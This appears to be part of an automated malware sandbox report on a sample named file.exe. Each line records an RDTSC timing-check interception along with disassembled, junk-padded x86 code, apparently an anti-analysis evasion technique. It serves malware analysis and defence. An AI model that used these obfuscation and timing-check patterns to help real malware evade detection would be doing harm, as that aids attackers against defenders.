Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A9033C second address: 4A90352 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90352 second address: 4A90356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90356 second address: 4A9035A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A9035A second address: 4A90360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90360 second address: 4A90366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90366 second address: 4A9036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA01B5 second address: 4AA01BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, A3E4h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA01BE second address: 4AA01C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0FBE second address: 4AD0FC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0FC4 second address: 4AD0FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0522 second address: 4AB0527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0527 second address: 4AB057D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 69h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE2E9211D86h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007FE2E9211D7Eh 0x00000017 call 00007FE2E9211D82h 0x0000001c pop esi 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 call 00007FE2E9211D7Eh 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB057D second address: 4AB05AE instructions: 0x00000000 rdtsc 0x00000002 mov edi, 26621966h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [ebp+08h] 0x0000000d pushad 0x0000000e mov ah, dl 0x00000010 call 00007FE2E9231EB4h 0x00000015 mov edi, ecx 0x00000017 pop eax 0x00000018 popad 0x00000019 and dword ptr [eax], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB05AE second address: 4AB05B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB05B2 second address: 4AB05B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB05B8 second address: 4AB0633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE2E9211D87h 0x00000009 xor eax, 1A4709FEh 0x0000000f jmp 00007FE2E9211D89h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a and dword ptr [eax+04h], 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FE2E9211D7Fh 0x00000027 and eax, 71545C0Eh 0x0000002d jmp 00007FE2E9211D89h 0x00000032 popfd 0x00000033 movzx eax, bx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0633 second address: 4AB0650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE2E9231EB9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0650 second address: 4AB0654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A904E3 second address: 4A904FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE2E9231EB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A904FB second address: 4A904FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0014 second address: 4AB0018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0018 second address: 4AB001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB001C second address: 4AB0022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0022 second address: 4AB003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE2E9211D89h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB003F second address: 4AB0080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE2E9231EACh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE2E9231EADh 0x00000018 sub ax, 8956h 0x0000001d jmp 00007FE2E9231EB1h 0x00000022 popfd 0x00000023 push eax 0x00000024 pop ebx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD065E second address: 4AD0662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0662 second address: 4AD0666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0666 second address: 4AD066C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD066C second address: 4AD0729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE2E9231EB0h 0x00000009 sbb ecx, 30209218h 0x0000000f jmp 00007FE2E9231EABh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FE2E9231EB8h 0x0000001b add esi, 784EFC78h 0x00000021 jmp 00007FE2E9231EABh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a mov ebp, esp 0x0000002c jmp 00007FE2E9231EB6h 0x00000031 xchg eax, ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FE2E9231EADh 0x0000003b sbb cx, 3FC6h 0x00000040 jmp 00007FE2E9231EB1h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007FE2E9231EB0h 0x0000004c jmp 00007FE2E9231EB5h 0x00000051 popfd 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0729 second address: 4AD0739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE2E9211D7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0739 second address: 4AD073D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD073D second address: 4AD075A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE2E9211D7Eh 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov dl, ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD075A second address: 4AD07EE instructions: 0x00000000 rdtsc 0x00000002 call 00007FE2E9231EB9h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FE2E9231EACh 0x00000010 pop esi 0x00000011 popad 0x00000012 mov eax, dword ptr [76FB65FCh] 0x00000017 pushad 0x00000018 call 00007FE2E9231EB7h 0x0000001d pushfd 0x0000001e jmp 00007FE2E9231EB8h 0x00000023 and eax, 44572518h 0x00000029 jmp 00007FE2E9231EABh 0x0000002e popfd 0x0000002f pop eax 0x00000030 mov ah, dh 0x00000032 popad 0x00000033 test eax, eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FE2E9231EB7h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD07EE second address: 4AD0892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE35B674ED1h 0x0000000f pushad 0x00000010 mov ecx, 7B48BC33h 0x00000015 jmp 00007FE2E9211D88h 0x0000001a popad 0x0000001b mov ecx, eax 0x0000001d pushad 0x0000001e mov dx, si 0x00000021 pushfd 0x00000022 jmp 00007FE2E9211D7Ah 0x00000027 add esi, 008DDB68h 0x0000002d jmp 00007FE2E9211D7Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xor eax, dword ptr [ebp+08h] 0x00000037 pushad 0x00000038 pushad 0x00000039 mov edx, 636762D6h 0x0000003e mov ebx, 7F4ED662h 0x00000043 popad 0x00000044 jmp 00007FE2E9211D83h 0x00000049 popad 0x0000004a and ecx, 1Fh 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FE2E9211D85h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0892 second address: 4AD08FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE2E9231EB7h 0x00000008 pushfd 0x00000009 jmp 00007FE2E9231EB8h 0x0000000e xor cx, FDB8h 0x00000013 jmp 00007FE2E9231EABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c ror eax, cl 0x0000001e pushad 0x0000001f jmp 00007FE2E9231EB4h 0x00000024 mov edi, esi 0x00000026 popad 0x00000027 leave 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD08FA second address: 4AD08FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD08FE second address: 4AD0917 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0917 second address: 4AD095B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE2E9211D87h 0x00000008 pop eax 0x00000009 mov ax, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [00152014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007FE2EDBD26C1h 0x0000002a push FFFFFFFEh 0x0000002c jmp 00007FE2E9211D7Bh 0x00000031 pop eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 call 00007FE2E9211D7Bh 0x0000003a pop esi 0x0000003b mov ecx, edi 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD095B second address: 4AD098D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007FE2EDBF2821h 0x00000011 mov edi, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE2E9231EB7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD098D second address: 4AD09E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE2E9211D7Fh 0x00000009 xor al, 0000005Eh 0x0000000c jmp 00007FE2E9211D89h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 jmp 00007FE2E9211D7Ah 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE2E9211D87h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD09E7 second address: 4AD09ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD09ED second address: 4AD09F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD09F1 second address: 4AD0A07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE2E9231EAAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0A07 second address: 4AD0A18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0A18 second address: 4AD0A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0A1C second address: 4AD0A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD0A2E second address: 4AD0A33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80008 second address: 4A8000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8000C second address: 4A80029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80029 second address: 4A80071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE2E9211D87h 0x00000009 jmp 00007FE2E9211D83h 0x0000000e popfd 0x0000000f push eax 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE2E9211D81h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80071 second address: 4A80077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80077 second address: 4A8007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8007B second address: 4A8007F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8007F second address: 4A800A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE2E9211D86h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, 1CC0h 0x00000016 mov eax, ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A800A9 second address: 4A800DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE2E9231EB0h 0x00000009 or cl, 00000008h 0x0000000c jmp 00007FE2E9231EABh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ebx, ecx 0x0000001c mov esi, 056AAE49h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A800DC second address: 4A80108 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 7568h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and esp, FFFFFFF8h 0x0000000f jmp 00007FE2E9211D7Dh 0x00000014 xchg eax, ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE2E9211D7Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80108 second address: 4A8010E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8010E second address: 4A8016A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, cx 0x0000000d mov dl, ah 0x0000000f popad 0x00000010 xchg eax, ecx 0x00000011 jmp 00007FE2E9211D83h 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FE2E9211D86h 0x0000001c push eax 0x0000001d jmp 00007FE2E9211D7Bh 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FE2E9211D80h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8016A second address: 4A8016E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8016E second address: 4A80174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80174 second address: 4A8017A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8017A second address: 4A801A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bl, A1h 0x00000013 movzx esi, dx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A801A4 second address: 4A801B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, BFh 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov eax, 36C1A5FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A801B7 second address: 4A801F1 instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007FE2E9211D86h 0x0000000c popad 0x0000000d mov dword ptr [esp], esi 0x00000010 jmp 00007FE2E9211D80h 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A801F1 second address: 4A801F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A801F5 second address: 4A80212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80212 second address: 4A80218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80218 second address: 4A8021C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8021C second address: 4A80220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80220 second address: 4A80236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE2E9211D7Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80236 second address: 4A802E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007FE2E9231EB3h 0x00000014 xor esi, 79A8966Eh 0x0000001a jmp 00007FE2E9231EB9h 0x0000001f popfd 0x00000020 pop ecx 0x00000021 mov ax, bx 0x00000024 popad 0x00000025 test esi, esi 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FE2E9231EB9h 0x0000002e and ecx, 7B87FD56h 0x00000034 jmp 00007FE2E9231EB1h 0x00000039 popfd 0x0000003a call 00007FE2E9231EB0h 0x0000003f mov ax, 9651h 0x00000043 pop esi 0x00000044 popad 0x00000045 je 00007FE35B6E01DFh 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e mov ecx, edi 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A802E8 second address: 4A80317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE2E9211D7Ch 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000015 pushad 0x00000016 mov si, di 0x00000019 mov dh, 07h 0x0000001b popad 0x0000001c je 00007FE35B6C0096h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 movzx esi, bx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80317 second address: 4A803BA instructions: 0x00000000 rdtsc 0x00000002 mov bh, 6Fh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FE2E9231EB2h 0x0000000b pushfd 0x0000000c jmp 00007FE2E9231EB2h 0x00000011 add ax, 2E98h 0x00000016 jmp 00007FE2E9231EABh 0x0000001b popfd 0x0000001c pop eax 0x0000001d popad 0x0000001e mov edx, dword ptr [esi+44h] 0x00000021 pushad 0x00000022 mov ecx, edx 0x00000024 movsx edi, si 0x00000027 popad 0x00000028 or edx, dword ptr [ebp+0Ch] 0x0000002b pushad 0x0000002c mov di, ax 0x0000002f pushfd 0x00000030 jmp 00007FE2E9231EB2h 0x00000035 or eax, 240C7028h 0x0000003b jmp 00007FE2E9231EABh 0x00000040 popfd 0x00000041 popad 0x00000042 test edx, 61000000h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b pushfd 0x0000004c jmp 00007FE2E9231EB2h 0x00000051 add eax, 66632288h 0x00000057 jmp 00007FE2E9231EABh 0x0000005c popfd 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A70711 second address: 4A7073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE2E9211D7Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A7073F second address: 4A70792 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE2E9231EB7h 0x00000008 pushfd 0x00000009 jmp 00007FE2E9231EB8h 0x0000000e sbb cx, B8B8h 0x00000013 jmp 00007FE2E9231EABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c and esp, FFFFFFF8h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov bh, 5Ch 0x00000024 movzx esi, bx 0x00000027 popad 0x00000028 rdtsc
